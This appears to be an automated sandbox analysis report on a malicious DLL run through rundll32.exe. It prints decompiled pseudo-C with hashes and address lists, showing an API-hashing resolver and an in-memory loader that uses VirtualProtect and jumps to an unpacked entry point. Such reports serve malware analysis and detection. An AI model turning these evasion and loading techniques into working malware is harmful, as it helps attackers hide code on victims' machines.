0x1001964a
0x1001964e
0x10019654
0x00000000
0x10019654
0x100195ef
0x100195f3
0x10019600
0x10019604
0x1001961a
0x10019622
0x10019606
0x10019608
0x10019612
0x10019612
0x10019628
0x10019631
0x10019648
0x00000000
0x00000000
0x00000000
0x10019648
0x10019633
0x10019633
0x00000000
0x10019628

Strings

, xrefs: 100199B3

Memory Dump Source

Source File: 00000004.00000002.326004095.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.325983786.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.326199252.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.326242722.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.326285629.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 78ded7ad58ccfe6e39af61f505e9c63cd873381c8b4d26e632723182d8e82be7
Instruction ID: 40addf1f47f77ce90969db43eb15dc0c4582e7f707f2120123862ccb300b72ca
Opcode Fuzzy Hash: 78ded7ad58ccfe6e39af61f505e9c63cd873381c8b4d26e632723182d8e82be7
Instruction Fuzzy Hash: A922893080C7998BE729CF15C49136ABBE0FF86340F14886EE9D65F291D335DA85DB92

Uniqueness

Uniqueness Score: -1.00%

Function 10011D58, Relevance: .3, Instructions: 282
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E10011D58(intOrPtr __eax) {
				void* _t72;
				intOrPtr _t74;
				signed int _t75;
				signed int _t76;
				signed char _t84;
				signed char _t86;
				signed char _t89;
				signed char _t92;
				signed char _t95;
				signed char* _t99;
				void* _t113;
				signed char _t114;
				signed char _t116;
				signed char _t118;
				intOrPtr _t119;
				signed char _t120;
				signed char _t127;
				signed char _t129;
				signed char _t130;
				signed char _t143;
				signed char _t145;
				signed char _t146;
				signed int _t147;
				signed char _t148;
				void* _t151;
				signed char _t155;
				signed char _t159;
				signed char _t165;
				signed char _t166;
				signed char _t167;
				signed char _t168;
				void* _t170;
				void* _t171;
				intOrPtr _t172;
				signed char _t173;
				intOrPtr _t174;
				intOrPtr* _t175;
				signed char _t176;
				signed char _t177;
				signed char _t178;
				signed char _t179;
				signed char* _t181;

				_t119 = __eax;
				_t143 =  *0x1001d21c; // 0x76470dcb
				if(_t143 == 0x76470dcb) {
					_t143 = 0;
					 *0x1001d21c = 0;
				}
				if(_t119 != 0xfe338407) {
					L4:
					_t174 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
					if(_t119 != 0xa7e21d79) {
						while(1) {
							L10:
							__eflags = _t143;
							if(_t143 == 0) {
								break;
							}
							_t72 = 0;
							_t120 = 0;
							__eflags = 0;
							while(1) {
								__eflags = _t119 -  *((intOrPtr*)(_t120 + _t143 + 8));
								if(_t119 ==  *((intOrPtr*)(_t120 + _t143 + 8))) {
									break;
								}
								_t72 = _t72 + 1;
								_t120 = _t120 + 0x10;
								__eflags = _t72 - 0x10;
								if(_t72 < 0x10) {
									continue;
								}
								_t143 =  *(_t143 + 0x100);
								goto L10;
							}
							return  *((intOrPtr*)(_t120 + _t143 + 0xc));
						}
						__eflags = _t119 - 0x94e21d79;
						if(_t119 != 0x94e21d79) {
							_t74 =  *((intOrPtr*)(_t174 + 0xc));
							_t175 =  *((intOrPtr*)(_t74 + 0xc));
							_t181[4] =  *(_t74 + 0x10);
							while(1) {
								_t172 =  *((intOrPtr*)(_t175 + 0x30));
								_t75 = 0;
								__eflags = 0;
								while(1) {
									_t145 =  *(_t172 + _t75 * 2) & 0x0000ffff;
									_t181[0x1c + _t75 * 2] = _t145;
									__eflags = _t145;
									_t146 =  *(_t175 + 0x2c) & 0x0000ffff;
									if(_t145 == 0) {
										break;
									}
									_t75 = _t75 + 1;
									__eflags = _t75 - _t146;
									if(_t75 <= _t146) {
										continue;
									}
									break;
								}
								__eflags = _t146;
								_t147 = 0;
								if(_t146 <= 0) {
									L34:
									_t76 = E10014FD4( &(_t181[0x13c]), _t147);
									__eflags = _t119 - (_t76 ^ 0x7af3da47);
									if(_t119 == (_t76 ^ 0x7af3da47)) {
										_t173 =  *(_t175 + 0x18);
										__eflags = _t173;
										if(_t173 == 0) {
											L55:
											return _t173;
										}
										L38:
										_t148 =  *0x1001d2ec; // 0x0
										__eflags = _t148 |  *0x1001d2ed;
										if((_t148 |  *0x1001d2ed) == 0) {
											_t176 =  *0x1001d21c; // 0x76470dcb
											__eflags = _t176;
											if(_t176 == 0) {
												 *0x1001d2ec = 1;
												_t177 = E100135F4(0x104);
												__eflags = _t177;
												if(_t177 == 0) {
													_t177 = 0;
													__eflags = 0;
													L62:
													 *0x1001d21c = _t177;
													 *0x1001d214 = E10013044(0xfe338407, 0xb0386671, 0xfe338407, 0xfe338407);
													 *0x1001d2ec = 0;
													L45:
													_t151 = 0;
													_t165 = 0;
													__eflags = 0;
													while(1) {
														__eflags =  *(_t165 + _t177 + 8);
														if( *(_t165 + _t177 + 8) == 0) {
															break;
														}
														_t151 = _t151 + 1;
														_t165 = _t165 + 0x10;
														__eflags = _t151 - 0x10;
														if(_t151 < 0x10) {
															continue;
														}
														_t84 = E100135F4(0x104);
														_t181[4] = _t84;
														__eflags =  *_t181;
														if( *_t181 == 0) {
															 *_t181 = 0;
															L53:
															 *( *_t181 + 0xc) = _t173;
															E1000D03C( *_t181,  &(_t181[0x1c]));
															_t155 =  *_t181;
															 *((intOrPtr*)(_t155 + 8)) = _t119;
															 *(_t177 + 0x100) = _t155;
															goto L55;
														}
														_t167 = _t84;
														_t86 = 0x10;
														do {
															_t181[0x13c] = _t86;
															E1000CFC8(_t167, 0);
															 *((intOrPtr*)(_t167 + 8)) = 0;
															 *((intOrPtr*)(_t167 + 0xc)) = 0;
															_t167 = _t167 + 0x10;
															_t86 = _t181[0x138] - 1;
															__eflags = _t86;
														} while (_t86 != 0);
														 *( *_t181 + 0x100) = 0;
														goto L53;
													}
													_t166 = _t165 + _t177;
													__eflags = _t166;
													 *(_t166 + 0xc) = _t173;
													E1000D03C(_t166,  &(_t181[0x1c]));
													 *((intOrPtr*)(_t166 + 8)) = _t119;
													goto L55;
												}
												_t168 = _t177;
												_t89 = 0x10;
												do {
													_t181[4] = _t89;
													E1000CFC8(_t168, 0);
													 *((intOrPtr*)(_t168 + 8)) = 0;
													 *((intOrPtr*)(_t168 + 0xc)) = 0;
													_t168 = _t168 + 0x10;
													_t89 =  *_t181 - 1;
													__eflags = _t89;
												} while (_t89 != 0);
												 *(_t177 + 0x100) = 0;
												goto L62;
											}
											_t159 =  *(_t176 + 0x100);
											while(1) {
												__eflags = _t159;
												if(_t159 == 0) {
													goto L45;
												}
												_t177 = _t159;
												_t159 =  *(_t159 + 0x100);
											}
											goto L45;
										}
										__eflags = _t119 - 0xfe338407;
										if(_t119 == 0xfe338407) {
											 *0x1001d220 = _t173;
										}
										goto L55;
									}
									__eflags = _t175 - _t181[4];
									if(_t175 != _t181[4]) {
										_t175 =  *_t175;
										continue;
									}
									L36:
									_t173 = 0;
									goto L55;
								}
								_t92 = 0;
								__eflags = 0;
								while(1) {
									_t126 =  *((char*)(_t172 + _t147 * 2));
									 *_t181 = _t92;
									_t39 = _t126 - 0x41; // -81
									__eflags = _t39 - 0x19;
									_t40 = _t126 + 0x20; // 0x10
									_t127 =  <=  ? _t40 :  *((char*)(_t172 + _t147 * 2));
									_t181[_t147 + 0x13c] = _t127;
									_t95 =  *_t181;
									__eflags = _t127;
									if(_t127 == 0) {
										goto L34;
									}
									_t92 = _t95 + 1;
									_t147 = _t147 + 1;
									__eflags = _t92 - ( *(_t175 + 0x2c) & 0x0000ffff);
									if(_t92 < ( *(_t175 + 0x2c) & 0x0000ffff)) {
										continue;
									}
									goto L34;
								}
								goto L34;
							}
						}
						_t170 = E10019A00();
						_t178 = 0;
						while(1) {
							_t129 = E10013044(0xfe338407, 0x790529cb, 0xfe338407, 0xfe338407);
							__eflags = _t129;
							if(_t129 == 0) {
								goto L16;
							}
							_t116 =  *_t129(0xffffffff, _t178, 0,  &(_t181[0x11c]), 0x1c, 0);
							__eflags = _t116;
							if(_t116 != 0) {
								goto L36;
							}
							L16:
							_t99 =  &(_t181[0x120]);
							_t173 =  *_t99;
							_t130 = _t99[8];
							__eflags = _t173 - _t170;
							if(_t173 > _t170) {
								L13:
								_t178 = _t178 + _t130;
								__eflags = _t178;
								continue;
							}
							__eflags = _t130 + _t173 - _t170;
							if(_t130 + _t173 <= _t170) {
								goto L13;
							}
							__eflags = _t173;
							if(_t173 == 0) {
								goto L55;
							}
							E1000F5A8( &(_t181[0x10]), 0x400);
							_t171 = E1000F4E0( &(_t181[0x10]), 0);
							_t179 = E10013044(0xfe338407, 0x790529cb, 0xfe338407, 0xfe338407);
							__eflags = _t179;
							if(_t179 == 0) {
								L21:
								E1000D000( &(_t181[0xc]),  *((intOrPtr*)(_t171 + 4)), 0);
								__eflags = E1000D210( &(_t181[8]), 0x5c);
								if(__eflags != 0) {
									_push(0x5c);
									E1000D650( &(_t181[0xc]), __eflags,  &(_t181[0x1bc]));
									E1000D03C( &(_t181[8]), _t181[0x1bc]);
									E1000D020( &(_t181[0x1bc]));
								}
								E1000DE70( &(_t181[0x20]), _t181[4], 0);
								E1000D020( &(_t181[4]));
								L24:
								E1000F678( &(_t181[0xc]));
								goto L38;
							}
							 *_t181 = E1000F4E0( &(_t181[0x10]), 0);
							_t113 = E1000F4F0( &(_t181[0xc]));
							_t114 =  *_t179(0xffffffff, _t173, 2, _t181[8], _t113, 0);
							__eflags = _t114;
							if(_t114 != 0) {
								goto L24;
							}
							goto L21;
						}
					}
					return  *((intOrPtr*)(_t174 + 8));
				} else {
					_t118 =  *0x1001d220; // 0xe86b6198
					if(_t118 != 0xe86b6198) {
						return _t118;
					}
					goto L4;
				}
			}

0x10011d62
0x10011d64
0x10011d70
0x10011d72
0x10011d74
0x10011d74
0x10011d80
0x10011d92
0x10011d98
0x10011da1
0x10011dc8
0x10011dc8
0x10011dc8
0x10011dca
0x00000000
0x00000000
0x10011dab
0x10011dad
0x10011dad
0x10011daf
0x10011daf
0x10011db3
0x00000000
0x00000000
0x10011db9
0x10011dba
0x10011dbd
0x10011dc0
0x00000000
0x00000000
0x10011dc2
0x00000000
0x10011dc2
0x00000000
0x100120f1
0x10011dcc
0x10011dd2
0x10011efe
0x10011f04
0x10011f07
0x10011f10
0x10011f10
0x10011f13
0x10011f13
0x10011f15
0x10011f15
0x10011f19
0x10011f1e
0x10011f20
0x10011f24
0x00000000
0x00000000
0x10011f26
0x10011f27
0x10011f29
0x00000000
0x00000000
0x00000000
0x10011f29
0x10011f2b
0x10011f2f
0x10011f30
0x10011f62
0x10011f69
0x10011f73
0x10011f75
0x10011f84
0x10011f87
0x10011f89
0x10012071
0x00000000
0x10012071
0x10011f8f
0x10011f8f
0x10011f95
0x10011f9b
0x10011fb4
0x10011fba
0x10011fbc
0x10012085
0x10012091
0x10012094
0x10012096
0x100120c7
0x100120c7
0x100120c9
0x100120d5
0x100120e0
0x100120e5
0x10011fd6
0x10011fd6
0x10011fd8
0x10011fd8
0x10011fda
0x10011fda
0x10011fdf
0x00000000
0x00000000
0x10011fe1
0x10011fe2
0x10011fe5
0x10011fe8
0x00000000
0x00000000
0x10011fef
0x10011ff4
0x10011ff9
0x10011ffd
0x10012038
0x1001203f
0x10012047
0x1001204a
0x1001204f
0x10012052
0x10012055
0x00000000
0x10012055
0x10011fff
0x10012003
0x10012004
0x10012008
0x1001200f
0x1001201d
0x10012020
0x10012023
0x10012026
0x10012026
0x10012026
0x1001202c
0x00000000
0x1001202c
0x1001205d
0x1001205d
0x10012066
0x10012069
0x1001206e
0x00000000
0x1001206e
0x10012098
0x1001209c
0x1001209d
0x100120a1
0x100120a5
0x100120af
0x100120b2
0x100120b5
0x100120b8
0x100120b8
0x100120b8
0x100120bb
0x00000000
0x100120bb
0x10011fc2
0x10011fd2
0x10011fd2
0x10011fd4
0x00000000
0x00000000
0x10011fca
0x10011fcc
0x10011fcc
0x00000000
0x10011fd2
0x10011f9d
0x10011fa3
0x10011fa9
0x10011fa9
0x00000000
0x10011fa3
0x10011f77
0x10011f7b
0x10011f0d
0x00000000
0x10011f0d
0x10011f7d
0x10011f7d
0x00000000
0x10011f7d
0x10011f32
0x10011f32
0x10011f34
0x10011f34
0x10011f38
0x10011f3b
0x10011f3e
0x10011f41
0x10011f47
0x10011f4a
0x10011f51
0x10011f54
0x10011f56
0x00000000
0x00000000
0x10011f58
0x10011f59
0x10011f5e
0x10011f60
0x00000000
0x00000000
0x00000000
0x10011f60
0x00000000
0x10011f34
0x10011f10
0x10011ddd
0x10011ddf
0x10011de5
0x10011df6
0x10011df8
0x10011dfa
0x00000000
0x00000000
0x10011e0d
0x10011e0f
0x10011e11
0x00000000
0x00000000
0x10011e17
0x10011e17
0x10011e1e
0x10011e20
0x10011e23
0x10011e25
0x10011de3
0x10011de3
0x10011de3
0x00000000
0x10011de3
0x10011e2a
0x10011e2c
0x00000000
0x00000000
0x10011e2e
0x10011e30
0x00000000
0x00000000
0x10011e3f
0x10011e4f
0x10011e62
0x10011e64
0x10011e66
0x10011e91
0x10011e9a
0x10011eaa
0x10011eac
0x10011eb5
0x10011ebc
0x10011ecc
0x10011ed3
0x10011ed3
0x10011ee2
0x10011eeb
0x10011ef0
0x10011ef4
0x00000000
0x10011ef4
0x10011e73
0x10011e7a
0x10011e8b
0x10011e8d
0x10011e8f
0x00000000
0x00000000
0x00000000
0x10011e8f
0x10011de5
0x00000000
0x10011d82
0x10011d82
0x10011d8c
0x1001207d
0x1001207d
0x00000000
0x10011d8c

Memory Dump Source

Source File: 00000004.00000002.326004095.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.325983786.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.326199252.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.326242722.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.326285629.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d1683bff0e1a29d0212b6883f1335e9ab6e3bc7cd7ca7886de007c2d64f20f4
Instruction ID: 5609b69e05a1b06f5233c8e7297c4b8c04bd3945fb3a39e2e71c43012004eafc
Opcode Fuzzy Hash: 5d1683bff0e1a29d0212b6883f1335e9ab6e3bc7cd7ca7886de007c2d64f20f4
Instruction Fuzzy Hash: 53A1E7746043459BE714EF15C880BAEB3E6FF94340F21CA2DE9948F296D771E982CB91

Uniqueness

Uniqueness Score: -1.00%

Function 10006D50, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10006D50() {

				 *0x1001d280 = GetUserNameW;
				 *0x1001D284 = MessageBoxW;
				 *0x1001D288 = GetLastError;
				 *0x1001D28C = CreateFileA;
				 *0x1001D290 = DebugBreak;
				 *0x1001D294 = FlushFileBuffers;
				 *0x1001D298 = FreeEnvironmentStringsA;
				 *0x1001D29C = GetConsoleOutputCP;
				 *0x1001D2A0 = GetEnvironmentStrings;
				 *0x1001D2A4 = GetLocaleInfoA;
				 *0x1001D2A8 = GetStartupInfoA;
				 *0x1001D2AC = GetStringTypeA;
				 *0x1001D2B0 = HeapValidate;
				 *0x1001D2B4 = IsBadReadPtr;
				 *0x1001D2B8 = LCMapStringA;
				 *0x1001D2BC = LoadLibraryA;
				 *0x1001D2C0 = OutputDebugStringA;
				return 0x1001d280;
			}

0x10006d61
0x10006d69
0x10006d6c
0x10006d7b
0x10006d7e
0x10006d8d
0x10006d90
0x10006d9f
0x10006da2
0x10006db1
0x10006db4
0x10006dc3
0x10006dc6
0x10006dd5
0x10006dd8
0x10006de7
0x10006dea
0x10006ded

Memory Dump Source

Source File: 00000004.00000002.326004095.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.325983786.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.326199252.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.326242722.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.326285629.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80f6e1a276fef8b33378afc9592b3d211071bdeb012eb600a46219d4b0432dd1
Instruction ID: 9a9f90be372116ce35b3bf57ca6adafecb814b37ff7dc50591bd4b03753dcc6b
Opcode Fuzzy Hash: 80f6e1a276fef8b33378afc9592b3d211071bdeb012eb600a46219d4b0432dd1
Instruction Fuzzy Hash: 99110FB8A05620CFD34ACF09D5D49117BF2BB8E360312C19AD8098B376D734D985CF54

Uniqueness

Uniqueness Score: -1.00%

Function 1000C218, Relevance: 5.1, Strings: 4, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E1000C218(void* __ecx, void* __edx) {
				char _v28;
				char _v33;
				char _v38;
				char _v43;
				void* _t24;
				char* _t25;
				char _t32;
				void* _t33;
				void* _t34;
				signed int _t38;
				char* _t40;

				_t40 = (_t38 & 0xfffffff0) - 0x2c;
				asm("movq xmm0, [edx]");
				_t32 = 0;
				 *_t40 = 0x7b;
				asm("movq [esp+0x1], xmm0");
				_v43 = 0x2d;
				do {
					 *((char*)(_t40 + _t32 + 0xa)) =  *((intOrPtr*)(_t32 + __edx + 8));
					_t32 = _t32 + 1;
				} while (_t32 < 4);
				_v38 = 0x2d;
				_t33 = 0;
				do {
					 *((char*)(_t40 + _t33 + 0xf)) =  *((intOrPtr*)(_t33 + __edx + 0xc));
					_t33 = _t33 + 1;
				} while (_t33 < 4);
				_v33 = 0x2d;
				_t34 = 0;
				do {
					 *((char*)(_t40 + _t34 + 0x14)) =  *((intOrPtr*)(_t34 + __edx + 0x10));
					_t34 = _t34 + 1;
				} while (_t34 < 4);
				_v28 = 0x2d;
				_t24 = 0;
				do {
					asm("movd xmm0, dword [eax+edx+0x14]");
					asm("movd [esp+eax+0x19], xmm0");
					_t24 = _t24 + 4;
				} while (_t24 < 0xc);
				_t25 = _t40;
				 *((char*)(_t25 + 0x25)) = 0x7d;
				 *((char*)(_t25 + 0x26)) = 0;
				E1000DFBC(__ecx, _t25, 0);
				return __ecx;
			}

0x1000c21f
0x1000c224
0x1000c228
0x1000c22a
0x1000c22e
0x1000c234
0x1000c239
0x1000c23d
0x1000c241
0x1000c242
0x1000c249
0x1000c24e
0x1000c250
0x1000c254
0x1000c258
0x1000c259
0x1000c260
0x1000c265
0x1000c267
0x1000c26b
0x1000c26f
0x1000c270
0x1000c275
0x1000c27a
0x1000c27c
0x1000c27c
0x1000c282
0x1000c288
0x1000c28b
0x1000c292
0x1000c295
0x1000c29b
0x1000c2a0
0x1000c2ae

Strings

-, xrefs: 1000C275
-, xrefs: 1000C260
-, xrefs: 1000C249
-, xrefs: 1000C234

Memory Dump Source

Source File: 00000004.00000002.326004095.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.325983786.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.326199252.000000001001A000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.326242722.000000001001D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.326285629.000000001001F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: -$-$-$-
API String ID: 0-1033403326
Opcode ID: 1d36367edc1a87d387ea343f4f2a29612f5303ddecac01934eed59726700fcc9
Instruction ID: 6420cdf91b2b9fc5655fa5f82b4c53aa5eb92ddd4154ae73ebf41adf494228f8
Opcode Fuzzy Hash: 1d36367edc1a87d387ea343f4f2a29612f5303ddecac01934eed59726700fcc9
Instruction Fuzzy Hash: C811252091C3C04CE749DB7C548462BFFD08F9A208F1886BEE4DA86B53E525D49683B7

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4788 Parent PID: 5980 rundll32.exeCOMMON

Executed Functions

Function 0322193D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 219
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E0322193D(void* __ebx, long __edi, long __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				char* _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				int _v160;
				intOrPtr _v164;
				char* _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				char _v180;
				intOrPtr* _t135;
				int _t142;
				int _t150;
				int _t154;
				intOrPtr _t169;
				int _t175;
				intOrPtr _t217;
				void* _t224;
				intOrPtr _t227;
				void* _t234;
				intOrPtr _t238;
				intOrPtr _t245;
				intOrPtr _t249;
				DWORD* _t263;
				void* _t267;
				intOrPtr* _t270;
				intOrPtr* _t271;

				_t135 = _a4;
				_v20 = 0;
				_t234 =  *((intOrPtr*)(_t135 + 0x28));
				 *0x3224418 = 1;
				asm("movaps xmm0, [0x3223010]");
				asm("movups [0x3224428], xmm0");
				_v48 = _t135;
				_v52 =  *((intOrPtr*)(_t135 + 0x44));
				_v56 =  *((intOrPtr*)(_v48 + 0xc));
				_v180 = _t234;
				_v176 =  *((intOrPtr*)(_v48 + 0x48));
				_v172 = 4;
				_v168 =  &_v20;
				_v60 =  *((intOrPtr*)(_t135 + 0x30));
				_v64 = 4;
				_v68 = _t234;
				_v72 =  &_v20;
				_t142 = VirtualProtect(__ebx, __esi, __edi, _t263); // executed
				_v76 = _t142;
				_v180 = _v68;
				_v176 = 0;
				_v172 =  *((intOrPtr*)(_v48 + 0x48));
				_v80 = 0x400;
				_v84 = 2;
				_v88 =  &_v20;
				_v92 = 0;
				E0322173B();
				E032221C2(_v68,  *_v48, _v60);
				E0322173B( *_v48, 0, _v60);
				_t150 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
				_t270 = _t267 - 0x84;
				_t224 = _v68;
				_t249 =  *((intOrPtr*)(_t224 + 0x3c));
				_v96 = _t150;
				_v100 = _v68 + 0x3c;
				_v104 = _t224;
				_v108 = _t249;
				if(_t249 != 0) {
					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v112 = _v104;
				if(_v56 != 0) {
					_v116 = 0;
					_v120 = _v112 + 0x18 + ( *(_v112 + 0x14) & 0x0000ffff);
					while(1) {
						_t169 = _v120;
						_v152 = _t169;
						_t245 = _v152;
						_v180 = _v68 +  *((intOrPtr*)(_t245 + 0xc));
						_v176 =  *((intOrPtr*)(_t245 + 8));
						_v172 =  *((intOrPtr*)(0x3224418 + (( *(_t169 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t169 + 0x24) >> 0x1f << 3) + (( *(_t169 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v168 =  &_v20;
						_v156 = _v116;
						_t175 = VirtualProtect(??, ??, ??, ??); // executed
						_t270 = _t270 - 0x10;
						_t217 = _v156 + 1;
						_v160 = _t175;
						_v116 = _t217;
						_v120 = _v152 + 0x28;
						if(_t217 == _v56) {
							goto L12;
						}
					}
				}
				L12:
				 *_t270 = _v68;
				_v132 = _v68 +  *((intOrPtr*)(_v48 + 0x3c));
				_t154 = DisableThreadLibraryCalls(??);
				_t271 = _t270 - 4;
				_t227 =  *_v100;
				_v164 = _t154;
				_v124 = _t227;
				_v128 = _v68;
				if(_t227 != 0) {
					_v128 = _v68 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_t238 = _v48;
				_v44 =  *((intOrPtr*)(_t238 + 0x40));
				_v40 =  *((intOrPtr*)(_t238 + 0x24));
				_v36 =  *((intOrPtr*)(_t238 + 0x38));
				_v32 =  *((intOrPtr*)(_t238 + 0x50));
				_v28 =  *((intOrPtr*)(_t238 + 0x18));
				_v24 = _v132;
				 *_t271 = _t238;
				_v180 = 0;
				_v176 = 0x5c;
				_v136 =  &_v44;
				_v140 = 0;
				_v144 = 0x5c;
				_v148 =  *((intOrPtr*)(_v128 + 0x28));
				E0322173B();
				if(_v148 != 0) {
					_t270 =  *((intOrPtr*)( &_v44 + 0x10));
					goto __eax;
				}
				return 1;
			}

0x03221949
0x03221957
0x0322195e
0x03221961
0x0322196b
0x03221972
0x0322197c
0x03221982
0x0322198b
0x03221994
0x03221997
0x0322199b
0x032219a3
0x032219aa
0x032219ad
0x032219b0
0x032219b3
0x032219b6
0x032219d0
0x032219d6
0x032219d9
0x032219e1
0x032219e5
0x032219e8
0x032219eb
0x032219ee
0x032219f1
0x03221a0c
0x03221a28
0x03221a4d
0x03221a4f
0x03221a58
0x03221a5b
0x03221a65
0x03221a68
0x03221a6b
0x03221a6e
0x03221a71
0x03221a8c
0x03221a8c
0x03221b76
0x03221b79
0x03221aa5
0x03221aa8
0x03221b84
0x03221b84
0x03221b9b
0x03221bc3
0x03221bcf
0x03221bd2
0x03221bd6
0x03221bda
0x03221be1
0x03221be7
0x03221be9
0x03221bf2
0x03221c03
0x03221c09
0x03221c0c
0x03221c0f
0x00000000
0x00000000
0x03221c11
0x03221b84
0x03221c31
0x03221c3f
0x03221c47
0x03221c4a
0x03221c4c
0x03221c52
0x03221c5e
0x03221c64
0x03221c67
0x03221c6a
0x03221ae4
0x03221ae4
0x03221af7
0x03221afd
0x03221b03
0x03221b09
0x03221b0f
0x03221b15
0x03221b1b
0x03221b1e
0x03221b21
0x03221b29
0x03221b31
0x03221b37
0x03221b3d
0x03221b43
0x03221b49
0x03221b57
0x03221c24
0x03221c2a
0x03221c2a
0x03221ac9

APIs

VirtualProtect.KERNELBASE ref: 032219B6
VirtualProtect.KERNELBASE ref: 03221A4D
VirtualProtect.KERNELBASE ref: 03221BE7

Strings

\, xrefs: 03221B29

Memory Dump Source

Source File: 00000011.00000002.488539213.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 2b25051360d1ef26c1b3cc3711c80876c628a4df4e997f4eb65b86255f715ee9
Instruction ID: 7e8fd033770887dbc409e8561525adce5f962a0b9a76cc463e6afdcf01e7360c
Opcode Fuzzy Hash: 2b25051360d1ef26c1b3cc3711c80876c628a4df4e997f4eb65b86255f715ee9
Instruction Fuzzy Hash: 3CB1BDB4D103289FCB14DFA9C980A9DFBF1BF88310F15856AE958AB351D330A991CF91

Uniqueness

Uniqueness Score: -1.00%

Function 03221C7F, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 03221D80

Memory Dump Source

Source File: 00000011.00000002.488539213.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
Instruction ID: cc92b0e2ad5993f204e4633982dbd087aaa5eebae84852f7c6f77197bfd171ec
Opcode Fuzzy Hash: 0ff62ffde6a8dc253aa636d38c27763328556fd3d4c59bc3456e4b3a190839dc
Instruction Fuzzy Hash: 0041C3B5E1461A9FDB44CFA8C890AAEFBF1FF48714F148529D848AB340D375A891CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 5204 Parent PID: 5980 rundll32.exeCOMMON

Executed Functions

Function 02CD193D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 219
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E02CD193D(void* __ebx, long __edi, long __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				void* _v68;
				char* _v72;
				int _v76;
				long _v80;
				long _v84;
				DWORD* _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				char* _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				int _v160;
				intOrPtr _v164;
				char* _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				char _v180;
				intOrPtr* _t135;
				int _t142;
				int _t150;
				int _t154;
				intOrPtr _t169;
				int _t175;
				intOrPtr _t217;
				void* _t224;
				intOrPtr _t227;
				void* _t234;
				intOrPtr _t238;
				intOrPtr _t245;
				intOrPtr _t249;
				DWORD* _t263;
				void* _t267;
				intOrPtr* _t270;
				intOrPtr* _t271;

				_t135 = _a4;
				_v20 = 0;
				_t234 =  *((intOrPtr*)(_t135 + 0x28));
				 *0x2cd4418 = 1;
				asm("movaps xmm0, [0x2cd3010]");
				asm("movups [0x2cd4428], xmm0");
				_v48 = _t135;
				_v52 =  *((intOrPtr*)(_t135 + 0x44));
